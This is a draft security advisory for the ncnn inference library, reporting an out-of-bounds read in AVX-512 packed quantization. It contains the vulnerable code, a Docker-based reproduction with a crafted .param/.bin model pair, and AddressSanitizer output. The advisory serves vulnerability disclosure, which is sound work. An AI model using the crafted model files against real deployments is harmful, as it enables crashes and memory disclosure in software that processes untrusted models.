All advisories
Draft

Out-of-Bounds Read in Packed Quantization

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

Out-of-Bounds Read in Packed Quantization

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/quantize_x86.cpp:149 in quantize_pack16to8
Sanitizer verdict: unknown-crash

Summary

A crafted model can declare a Quantize layer with fewer scale values than the tensor it is applied to, and on AVX-512 builds the packed 16-to-8 path reads 64 bytes of scale data per row regardless. Declaring scale_data_size=2 while feeding the layer a 32-row FP32 tensor (which packs to elempack=16) makes Quantize_x86::forward build a 16-element view starting 16 floats into a 2-float buffer, and the _mm512_loadu_ps in quantize_pack16to8 reads past the allocation. ncnnoptimize loads the attacker's .param/.bin pair and crashes during shape inference.

Detail

The untrusted field is param key 0 of the Quantize layer. Quantize::load_param stores it as scale_data_size and Quantize::load_model allocates exactly that many floats (scale_data = mb.load(scale_data_size, 1);). The x86 forward path then slices that buffer per packed row using the tensor's elempack, never checking that scale_data_size covers h * elempack:

// src/layer/x86/quantize_x86.cpp:351
            for (int i = 0; i < h; i++)
            {
                const float* ptr = bottom_blob.row(i);
                signed char* s8ptr0 = top_blob.row<signed char>(i * 2);
                signed char* s8ptr1 = top_blob.row<signed char>(i * 2 + 1);

                const Mat scale_data_i = scale_data_size > 1 ? scale_data.range(i * elempack, elempack) : scale_data;

                quantize_pack16to8(ptr, s8ptr0, s8ptr1, scale_data_i, w);
            }

// src/layer/x86/quantize_x86.cpp:145
    float scale = scale_data[0];
    __m512 _scale = _mm512_set1_ps(scale);
    if (scale_data_size > 1)
    {
        _scale = _mm512_loadu_ps((const float*)scale_data);
    }

Mat::range(x, n) is a pure pointer-and-width rewrite — Mat m(n, (unsigned char*)data + x * elemsize, ...) — so it happily produces a 16-wide view rooted anywhere inside (or beyond) the 2-float buffer. Worse, the callee re-reads scale_data.w from that synthetic view, so scale_data_size inside quantize_pack16to8 is 16, not 2, and the wide load is unconditionally taken.

With the PoC the input is a 1x32 FP32 tensor, which packs to elempack = 16 (32 % 16 == 0) with h = 2, and out_elempack = h * elempack % 8 == 0 ? 8 : 1 selects 8, entering the elempack == 16 && out_elempack == 8 branch. Row i = 0 slices range(0, 16) and its 64-byte load still fits inside the allocation's over-read padding; row i = 1 slices range(16, 16), whose base is 64 bytes into the 84-byte scale region, and the _mm512_loadu_ps reads bytes 64..127 — past the end. ASan reports the 64-byte read and aborts the optimizer.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-out-of-bounds-read-in-packed-quantization && cd ncnn-poc-out-of-bounds-read-in-packed-quantization

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > test.param <<'POC_EOF'
7767517
2 2
Input data 0 1 data 0=1 1=32
Quantize q 1 1 data out 0=2
POC_EOF

printf '\x00\x00\x80\x3f\x00\x00\x00\x40' > test.bin

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize test.param test.bin out.param out.bin 0

AddressSanitizer output:

shape_inference
=================================================================
==1==ERROR: AddressSanitizer: unknown-crash on address 0x50e000000080 at pc 0x5d9c764a8137 bp 0x7ffecb7c9ab0 sp 0x7ffecb7c9aa0
READ of size 64 at 0x50e000000080 thread T0
    #0 0x5d9c764a8136 in _mm512_loadu_ps(void const*) /usr/lib/gcc/x86_64-linux-gnu/13/include/avx512fintrin.h:6342
    #1 0x5d9c764a8136 in quantize_pack16to8 /ncnn/build/src/layer/x86/quantize_x86_avx512.cpp:149
    #2 0x5d9c764ad4e4 in ncnn::Quantize_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/quantize_x86_avx512.cpp:359
    #3 0x5d9c70bd8f2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
    #4 0x5d9c70bcab7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #5 0x5d9c70c2a9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #6 0x5d9c70abc3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #7 0x5d9c70b39eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #8 0x7745068a91c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #9 0x7745068a928a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #10 0x5d9c70ab9624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x50e000000094 is located 0 bytes after 84-byte region [0x50e000000040,0x50e000000094)
allocated by thread T0 here:
    #0 0x774506f22f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x5d9c70b88bc5 in fastMalloc /ncnn/src/allocator.h:62
    #2 0x5d9c70b88bc5 in ncnn::Mat::create(int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:331
    #3 0x5d9c70bbdc1a in ncnn::ModelBinFromDataReader::load(int, int) const /ncnn/src/modelbin.cpp:309
    #4 0x5d9c76459738 in ncnn::Quantize::load_model(ncnn::ModelBin const&) /ncnn/src/layer/quantize.cpp:23
    #5 0x5d9c70c25a84 in ncnn::Net::load_model(ncnn::DataReader const&) /ncnn/src/net.cpp:2080
    #6 0x5d9c70c2690a in ncnn::Net::load_model(_IO_FILE*) /ncnn/src/net.cpp:2257
    #7 0x5d9c70c26c91 in ncnn::Net::load_model(char const*) /ncnn/src/net.cpp:2292
    #8 0x5d9c70b39caf in main /ncnn/tools/ncnnoptimize.cpp:2797
    #9 0x7745068a91c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #10 0x7745068a928a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #11 0x5d9c70ab9624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: unknown-crash /usr/lib/gcc/x86_64-linux-gnu/13/include/avx512fintrin.h:6342 in _mm512_loadu_ps(void const*)

Credit

Zheng Yu @ DepthFirst